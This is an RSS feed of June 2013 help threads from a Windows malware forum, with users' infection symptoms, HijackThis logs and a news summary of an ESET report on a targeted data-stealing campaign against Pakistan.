DaniWeb IT Discussion Community - Viruses, Spyware and other Nasties http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64 Our Viruses, Spyware and other Nasties forum is the place for Q&A-style discussions related to Windows security. Post a HijackThis log here if you think you've got viruses, spyware, adware, malware, or other unwanted guests. en-US 60 Help me my pc wont let me do anything :/ http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456794/help-me-my-pc-wont-let-me-do-anything- Sun, 16 Jun 2013 20:00:13 +0000 Hi, basically my laptop wont let me do anything. It wont connect to an internet connection, it does t recognise any USB, services wont work, system restore doesnt work, alot of settings doesnt work, most things i click on, a message pops up saying "The specified service does not exist ... Hi, basically my laptop wont let me do anything. It wont connect to an internet connection, it does t recognise any USB, services wont work, system restore doesnt work, alot of settings doesnt work, most things i click on, a message pops up saying "The specified service does not exist as an installed service. Basically the only thing i can do is go through pictures and other files. I cant even create a new user or anything. Please help xX

]]> Viruses, Spyware and other Nasties clayden http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456794/help-me-my-pc-wont-let-me-do-anything- search.us.com http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456756/search.us.com Sun, 16 Jun 2013 08:31:27 +0000 I have just tried removing search.us.com from my computer both in chrome and firefox - using windows XP operating system I have tried the following programes which all say they can remove it Spyhunter Hitman Pro Malwarebytes with no success Has anyone a suggestion on how to get rid of ... I have just tried removing search.us.com from my computer both in chrome and firefox - using windows XP operating system
I have tried the following programes which all say they can remove it
Spyhunter
Hitman Pro
Malwarebytes
with no success

Has anyone a suggestion on how to get rid of it?
Thanks
bgrimwade

]]> Viruses, Spyware and other Nasties bgrimwade http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456756/search.us.com Panda Gloval Security 2013 (Cloud) http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456282/panda-gloval-security-2013-cloud Sun, 09 Jun 2013 22:10:01 +0000 I got malware from something that I thought was Adobe Flash. It was not-I deleted it from control panel. I still had sweetpacks a toolbar that would not go away. It was not in my control panel. I had one dialogue box and I contacted Panda, they did four remotes ... I got malware from something that I thought was Adobe Flash. It was not-I deleted it from control panel. I still had sweetpacks a toolbar that would not go away. It was not in my control panel. I had one dialogue box and I contacted Panda, they did four remotes on my computer. Each time they did a remote on my computer--I got more dialgue boxes. It got so bad that I had to use ctrl, alt, del,to get out of my internet and that to shut down my computer. I had to finally do a restoration on my computer because of the following dialogue boxes: Pcloudcleaner (Access violation at address 718B6632, 71536632, 70C96632, 70DB6632 in moculs "MSVCR90.dll". Read of address A4EA131, A4EA6035, A4EA4349, A4EA224D, 539BAB01, 8BEEA4BC, 00000004. I got this from using their new antivirus Cloud cleaner.

]]> Viruses, Spyware and other Nasties Iboney http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456282/panda-gloval-security-2013-cloud Can u give more abt shortcut virus. . how they are created ? how it affect. http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456200/can-u-give-more-abt-shortcut-virus.-.-how-they-are-created-how-it-affect Sat, 08 Jun 2013 07:15:17 +0000 how shortcut viruses are created. how it affects the folders into shortcut files ? how shortcut viruses are created. how it affects the folders into shortcut files ?

]]> Viruses, Spyware and other Nasties killer88 http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456200/can-u-give-more-abt-shortcut-virus.-.-how-they-are-created-how-it-affect Internet explorer keeps opening pages and refreshing itself on its own http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456131/internet-explorer-keeps-opening-pages-and-refreshing-itself-on-its-own Fri, 07 Jun 2013 02:28:50 +0000 I am about at my wits end with this laptop. For no apparent reason and nothing setting it off, Internet explorer, as well as other browsers in the past keep opening themselves up, refresing and eventually rendering it unusable. I have ran Malwarebytes, Mcaffee antivirus, all sorts of other programs ... I am about at my wits end with this laptop. For no apparent reason and nothing setting it off, Internet explorer, as well as other browsers in the past keep opening themselves up, refresing and eventually rendering it unusable. I have ran Malwarebytes, Mcaffee antivirus, all sorts of other programs and they have all found nothing. I have reformatted and reimaged windows 7 at least three times now and it still does it. I just reimaged yesterday and still having the problem. I downloaded Hijackthis and saved a log and here it is...PLEASE HELP ME!! Thank You!!

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 10:21:13 PM, on 6/6/2013
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v8.00 (8.00.7601.17514)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\HP SimplePass 2011\TouchControl.exe
C:\Program Files (x86)\HP SimplePass 2011\BioMonitor.exe
C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
C:\Users\Stacy\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1IQ33ZZA\HijackThis[1].exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: TSBHO Class - {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} - C:\Program Files (x86)\HP SimplePass 2011\IEBHO.dll
O4 - HKLM..\Run: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
O4 - HKLM..\Run: [HP Quick Launch] C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
O4 - HKLM..\Run: [HPOSD] C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
O4 - HKLM..\Run: [HPConnectionManager] C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\HPCMDelayStart.exe
O23 - Service: Andrea ST Filters Service (AESTFilters) - Andrea Electronics Corporation - C:\Program Files\IDT\WDM\AESTSr64.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: AMD FUEL Service - Advanced Micro Devices, Inc. - C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: TrueSuiteService (FPLService) - HP - C:\Program Files (x86)\HP SimplePass 2011\TrueSuiteService.exe
O23 - Service: HP Health Check Service - Hewlett-Packard Company - C:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe
O23 - Service: HP Connection Manager 4.0 Service (hpCMSrv) - Hewlett-Packard Development Company L.P. - C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\hpCMSrv.exe
O23 - Service: HP Quick Synchronization Service (HPDrvMntSvc.exe) - Hewlett-Packard Company - C:\Program Files (x86)\Hewlett-Packard\Shared\HPDrvMntSvc.exe
O23 - Service: HP Software Framework Service (hpqwmiex) - Hewlett-Packard Company - C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
O23 - Service: HP Service (hpsrv) - Unknown owner - C:\Windows\system32\Hpservice.exe (file missing)
O23 - Service: HPWMISVC - Hewlett-Packard Development Company, L.P. - C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
O23 - Service: IconMan_R - Realsil Microelectronics Inc. - C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\stlang64.dll,-10101 (STacSV) - IDT, Inc. - C:\Program Files\IDT\WDM\STacSV64.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: WMPNetworkSvc - Unknown owner - (no file)

--
End of file - 6203 bytes

]]> Viruses, Spyware and other Nasties scottys623 http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/456131/internet-explorer-keeps-opening-pages-and-refreshing-itself-on-its-own Internet browser keeps starting up by itself, and constantly refreshing http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455980/internet-browser-keeps-starting-up-by-itself-and-constantly-refreshing Wed, 05 Jun 2013 04:09:26 +0000 Hi,my internet browser keeps turning on by itself randomly. I did alot of virus checks and still no luck. It seems to be a deeply rooted virus. I changed the default browser, but it doesn't matter, internet browser just keeps turning on at random times, and sometimes, several times. Hi,my internet browser keeps turning on by itself randomly. I did alot of virus checks and still no luck. It seems to be a deeply rooted virus. I changed the default browser, but it doesn't matter, internet browser just keeps turning on at random times, and sometimes, several times.

]]> Viruses, Spyware and other Nasties inaams14 http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455980/internet-browser-keeps-starting-up-by-itself-and-constantly-refreshing need help with very nasty virus, http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455949/need-help-with-very-nasty-virus Tue, 04 Jun 2013 14:29:08 +0000 ok so the OS is windows 7 and here is whats happening. he caught it once and we were able to remove it but we cant do it by the same means this time, anyways heres what its doing.. Taskmanager is dissabled. Desktop is gone, no start bar, NO SAFE ... ok so the OS is windows 7 and here is whats happening.

he caught it once and we were able to remove it but we cant do it by the same means this time,

anyways heres what its doing..

Taskmanager is dissabled.
Desktop is gone,
no start bar,
NO SAFE MODE

everytime we try to go into safe mode as soon as we log in it restarts. so safe mode is out of the question.

a white screen pops up for 2 secounds in normal mode. and if you hit the power button to shut it off u can see all the stuff running in the background like AVG and HITMAN saying its infected then restarts.

it was if i remember
trojan cryptik.H

]]> Viruses, Spyware and other Nasties strawhat068 http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455949/need-help-with-very-nasty-virus What is TryBarAPPAV http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455845/what-is-trybarappav Mon, 03 Jun 2013 06:45:12 +0000 Recently, each time I am closing down WinXP I get this: Ending Peogram TryBarAPPAV". Does anyone know of this application/program? I tried googling it and it only shows responses in spanish which I cannot read or understand. Of late my pc (WinXP) has become very slow and the commit charge ... Recently, each time I am closing down WinXP I get this: Ending Peogram TryBarAPPAV". Does anyone know of this application/program? I tried googling it and it only shows responses in spanish which I cannot read or understand. Of late my pc (WinXP) has become very slow and the commit charge in Task Manager goes sky high. I would appreciate any and all help re TryBarAppAV. Could it be a virus?

]]> Viruses, Spyware and other Nasties chukeej http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455845/what-is-trybarappav PLEASE-Need a little Help--Running very slow http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455733/please-need-a-little-help-running-very-slow Sat, 01 Jun 2013 00:27:48 +0000 Hello, Could use a little help please. I can't update to sp2 for Vista and have not been able to update in almost a year. My windows media player plays all songs but very choppy. They do work fine on other computers. Vista is terrible so any help to make ... Hello,
Could use a little help please. I can't update to sp2 for Vista and have not been able to update in almost a year. My windows media player plays all songs but very choppy. They do work fine on other computers. Vista is terrible so any help to make it a little better would be appreciated. my log is as follows:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 5:06:47 PM, on 8/14/2009
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18226)
Boot mode: Normal

Running processes:
C:\Program Files\Dell\DellDock\DellDock.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\igfxsrvc.exe
C:\Program Files\Common Files\Dell\apache\bin\httpd.exe
C:\PROGRA~1\McAfee.com\Agent\mcagent.exe
C:\Program Files\Dell DataSafe Local Backup\Components\scheduler\STService.exe
C:\Program Files\Dell DataSafe Local Backup\Components\DSUpdate\DSUpd.exe
C:\Program Files\DellTPad\Apoint.exe
C:\Program Files\IDT\WDM\sttray.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Windows\System32\WLTRAY.EXE
C:\Program Files\Dell\QuickSet\quickset.exe
C:\Program Files\Intel\Intel Matrix Storage Manager\IAAnotif.exe
C:\Program Files\Dell DataSafe Online\DataSafeOnline.exe
C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Dell Support Center\bin\sprtcmd.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\DellTPad\ApMsgFwd.exe
C:\Program Files\DellTPad\Apntex.exe
C:\Program Files\DellTPad\HidFind.exe
C:\Program Files\Windows Media Player\WMPNSCFG.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

O23 - Service: Remote Access DB (dsl-db) - Unknown owner - C:\Program Files\Common Files\Dell\MySQL\bin\mysqld.exe
O23 - Service: Remote Access File Sync Service (dsl-fs-sync) - SingleClick Systems - C:\Program Files\Common Files\Dell\Remote Access File Sync Service\dsl_fs_sync.exe
O23 - Service: GameConsoleService - WildTangent, Inc. - C:\Program Files\WildTangent\Dell Games\Dell Game Console\GameConsoleService.exe
O23 - Service: GoToAssist - Citrix Online, a division of Citrix Systems, Inc. - C:\Program Files\Citrix\GoToAssist\514\g2aservice.exe
O23 - Service: Advanced Networking Service (hnmsvc) - Dell Inc. - c:\Program Files\Common Files\Dell\Advanced Networking Service\hnm_svc.exe
O23 - Service: Intel(R) Matrix Storage Event Monitor (IAANTMON) - Intel Corporation - C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTMon.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: McAfee Services (mcmscsvc) - McAfee, Inc. - C:\Program Files\McAfee\MSC\mcmscsvc.exe
O23 - Service: McAfee Network Agent (McNASvc) - McAfee, Inc. - C:\Program Files\Common Files\mcafee\mna\mcnasvc.exe
O23 - Service: McAfee Scanner (McODS) - McAfee, Inc. - C:\Program Files\McAfee\VIRUSS~1\mcods.exe
O23 - Service: McAfee Proxy Service (McProxy) - McAfee, Inc. - C:\PROGRA~1\COMMON~1\McAfee\McProxy\McProxy.exe
O23 - Service: McAfee Real-time Scanner (McShield) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
O23 - Service: McAfee SystemGuards (McSysmon) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
O23 - Service: McAfee Personal Firewall Service (MpfService) - McAfee, Inc. - C:\Program Files\McAfee\MPF\MPFSrv.exe
O23 - Service: McAfee Anti-Spam Service (MSK80Service) - McAfee, Inc. - C:\Program Files\McAfee\MSK\MskSrver.exe
O23 - Service: SoftThinks Agent Service (SftService) - SoftThinks - C:\Program Files\Dell DataSafe Local Backup\sftservice.EXE
O23 - Service: SupportSoft Sprocket Service (DellSupportCenter) (sprtsvc_DellSupportCenter) - SupportSoft, Inc. - C:\Program Files\Dell Support Center\bin\sprtsvc.exe
O23 - Service: Audio Service (STacSV) - IDT, Inc. - C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_f6ef8056\STacSV.exe
O23 - Service: stllssvr - MicroVision Development, Inc. - C:\Program Files\Common Files\SureThing Shared\stllssvr.exe
O23 - Service: Dell Wireless WLAN Tray Service (wltrysvc) - Unknown owner - C:\Windows\System32\WLTRYSVC.EXE
O23 - Service: Marvell Yukon Service (yksvc) - Unknown owner - RUNDLL32.EXE (file missing)

--
End of file - 4153 bytes

Thanks in advance -Chris

]]> Viruses, Spyware and other Nasties pcmic http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455733/please-need-a-little-help-running-very-slow Virus http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455298/virus Sat, 25 May 2013 16:39:10 +0000 My pc was rinning slow so i scanned with malewarebytes. I found these viruses and deleted them but each time i use the computer they re-appear again . Trojan Facebook Trojan Agent My pc was rinning slow so i scanned with malewarebytes. I found these viruses and deleted them but each time i use the computer they re-appear again .

Trojan Facebook
Trojan Agent

]]> Viruses, Spyware and other Nasties desmondo http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455298/virus Internet Explorer keeps starting on its own. HELP! http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455211/internet-explorer-keeps-starting-on-its-own.-help Fri, 24 May 2013 01:46:31 +0000 Okay, so I am horrible with computers so this may be just an easy fix. For the past two days Internet Explorer keeps on starting on its own. It does not open to an actual website but in the search bar there are always random, incomplete urls (the most recent ... Okay, so I am horrible with computers so this may be just an easy fix. For the past two days Internet Explorer keeps on starting on its own. It does not open to an actual website but in the search bar there are always random, incomplete urls (the most recent example: http://nskduikwwxzkok/). It's my laptop for class so it is unbelievably annoying.

Please, please help me out.

]]> Viruses, Spyware and other Nasties kays109 http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/455211/internet-explorer-keeps-starting-on-its-own.-help Indian hackers take aim at Pakistan data during two year attack http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/454905/indian-hackers-take-aim-at-pakistan-data-during-two-year-attack Sun, 19 May 2013 09:13:22 +0000 Security researchers at ESET [have revealed](http://www.welivesecurity.com/2013/05/16/targeted-threat-pakistan-india/) that a prolonged and highly targeted data stealing attack aimed at Pakistan, using fake PDF documents, appears to have originated in India. Using a code signing certificate (issued to what looks like a legitimate company 'Technical and Commercial Consulting Pvt. Ltd') to sign malicious ... Security researchers at ESET have revealed that a prolonged and highly targeted data stealing attack aimed at Pakistan, using fake PDF documents, appears to have originated in India.

Using a code signing certificate (issued to what looks like a legitimate company 'Technical and Commercial Consulting Pvt. Ltd') to sign malicious binaries the chances of them being able to distribute the payload was greatly improved. The company concerned, ESET says, was based in New Delhi and the certificate itself was issued in 2011. Documents, mainly PDFs, attached to emails were infected with data stealing malware and signed off with the aforementioned certificate to add authenticity.

ESET malware researcher Jean-Ian Boutin reveals that during the investigation there were several leads that indicated the threat originates from India. "First, the code signing certificate was issued to an Indian company. In addition, all the signing timestamps are between 5:06 and 13:45 UTC, which is consistent with 8-hour work shifts falling between 10:36 and 19:15 in Indian Standard Time" he says, continuing, "we have identified several different documents that followed different themes likely to be enticing to the recipients. One of these is the Indian armed forces". Although Boutin admits that there is no precise information at this point as to which individuals or organisations were specifically targeted by the files. "Based on our investigations" he continues "it is our assumption that people and institutions in Pakistan were targeted".

One of the fake PDF files was delivered through a self-extracting archive called “pakistandefencetoindiantopmiltrysecreat.exe”, and ESET telemetry data shows that Pakistan is heavily affected by this campaign with 79% of detections being in that country. The first infection vector was utilising a widely used and abused vulnerability known as CVE-2012-0158. This vulnerability can be exploited by specially crafted Microsoft Office documents and allows arbitrary code execution. The documents were delivered by email, and the malicious code was executed as soon as the document was opened – without the attacked computer user even knowing. The other infection vector was via Windows executable files appearing to be Word or PDF documents – again distributed via email. In both cases, to evade suspicion by the victim, fake documents are shown to the user on execution.

"The malware was stealing sensitive data from infected PCs and sending them to the attackers’ servers" Boutin adds "It was using various types of data-stealing techniques, among them a key-logger, taking screenshots and uploading documents to attackers’ computer. Interestingly, the information stolen from an infected computer was uploaded to the attacker’s server unencrypted."

9655f62f48a2535f9f2b42836c10e856

As you can see from the above screenshot, several strings in the binaries analysed by ESET are related to Indian culture, in particular a variable called ramukaka was used. Boutin explains that "Ramu Kaka is a typical Bollywood-style servant in a house. Considering that this variable is responsible for achieving persistence on the system, this definition is a good fit".

However, the most compelling argument to suggest that the attacks originate in India is to be found within the ESET research telemetry data. According to Boutin lots of malware variants tied to the attack appeared in the same location during a small time-frame. Each of these were very similar to each other, which strongly suggests an attempt to evade malware detection. "These files all appeared in the same region of India" Boutin concludes...

]]> Viruses, Spyware and other Nasties happygeek http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/454905/indian-hackers-take-aim-at-pakistan-data-during-two-year-attack Corruption Lingers Following Removal of Malware http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/454892/corruption-lingers-following-removal-of-malware Sat, 18 May 2013 23:59:14 +0000 Greetings, My laptop was infected with the Rogue Malware called Internet Security 2013. I had some success in removing it after using Malwarebytes, but there are corruptions that linger. For instance, my Microsoft Security Essentials was not recognizing the only user as the administrator. I fixed this by entirely removing ... Greetings,

My laptop was infected with the Rogue Malware called Internet Security 2013. I had some success in removing it after using Malwarebytes, but there are corruptions that linger. For instance, my Microsoft Security Essentials was not recognizing the only user as the administrator. I fixed this by entirely removing MSE with Microsoft's fix it program; however, I'm now unable to reinstall MSE--even from a flash drive. It is an installation error (probably due to lingering corruption) and not a download error. Of second order is the problem with Internet Explorer. With the infection of the rogue software, IE9 began to refuse everything I tried to download (firefox[second browser], all antivirus/anti-malware software) as a virus and rejected it. I am able to use firefox (once again, ported from a flash drive) and download anything including software.

I have run several different programs and each has either found something that another did not find or has come up clean.

Malwarebytes
Security Check
AdwCleaner
RogueKiller
Microsoft Fix It
RKill
DDS

Let me know which logs are desired.

Thanks a bunch,

-OB

]]> Viruses, Spyware and other Nasties OutbreaK http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/454892/corruption-lingers-following-removal-of-malware IE automaticlly open on startup! http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/454876/ie-automaticlly-open-on-startup Sat, 18 May 2013 16:58:14 +0000 I seem to have a problem with my internet explorer. it is starting up automatically when I start my computerI have checked the MSCONFIG and regitry settings for startup but iexplore is not listed anywhere, not even in the startup folder. I also did a HijackThis scan and i am ... I seem to have a problem with my internet explorer. it is starting up automatically when I start my computerI have checked the MSCONFIG and regitry settings for startup but iexplore is not listed anywhere, not even in the startup folder. I also did a HijackThis scan and i am posting it here.

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 12:54:56 AM, on 19/5/2013
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v10.0 (10.00.9200.16576)
Boot mode: Normal

Running processes:
C:\Windows\SysWOW64\rundll32.exe
C:\Program Files (x86)\WebcamMax\wcmmon.exe
C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
C:\Program Files (x86)\Launch Manager\LManager.exe
C:\Program Files (x86)\Acer\clear.fi\Movie\clear.fiMovieService.exe
C:\Program Files (x86)\Winamp\winampa.exe
C:\Program Files (x86)\Celcom Broadband\UIExec.exe
C:\Program Files (x86)\Acer\clear.fi\MVP\clear.fiAgent.exe
C:\Program Files (x86)\Launch Manager\LMworker.exe
C:\Program Files (x86)\Acer\clear.fi\MVP.\Kernel\DMR\DMREngine.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Internet Download Manager\IDMan.exe
C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
C:\Windows\system32.exe
C:\Program Files (x86)\Internet Explorer\IELowutil.exe
C:\Program Files (x86)\HijackThis\Trend Micro\HiJackThis\HiJackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://acer.msn.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://acer.msn.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: IDM Helper - {0055C089-8582-441B-A0BF-17B458C2A3A8} - C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll
O2 - BHO: WsSVRIEHelper - {65DEE40A-3E93-4cae-9F98-B8E06DCEE2BF} - C:\Program Files (x86)\Wondershare\Video Converter Ultimate\SVRIEPlugin.dll
O2 - BHO: IESpeakDoc - {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} - C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: SingleInstance Class - {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\YTSingleInstance.dll
O4 - HKLM..\Run: [BackupManagerTray] "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
O4 - HKLM..\Run: [SuiteTray] "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
O4 - HKLM..\Run: [Dolby Advanced Audio v2] "C:\Dolby PCEE4\pcee4.exe" -autostart
O4 - HKLM..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O4 - HKLM..\Run: [ArcadeMovieService] "C:\Program Files (x86)\Acer\clear.fi\Movie\clear.fiMovieService.exe"
O4 - HKLM..\Run: [WinampAgent] "C:\Program Files (x86)\Winamp\winampa.exe"
O4 - HKLM..\Run: [BrowserPlugInHelper] C:\Program Files (x86)\Wondershare\Video Converter Ultimate\BrowserPlugInHelper.exe
O4 - HKLM..\Run: [SwitchBoard] C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
O4 - HKLM..\Run: [AdobeCS6ServiceManager] "C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe" -launchedbylogin
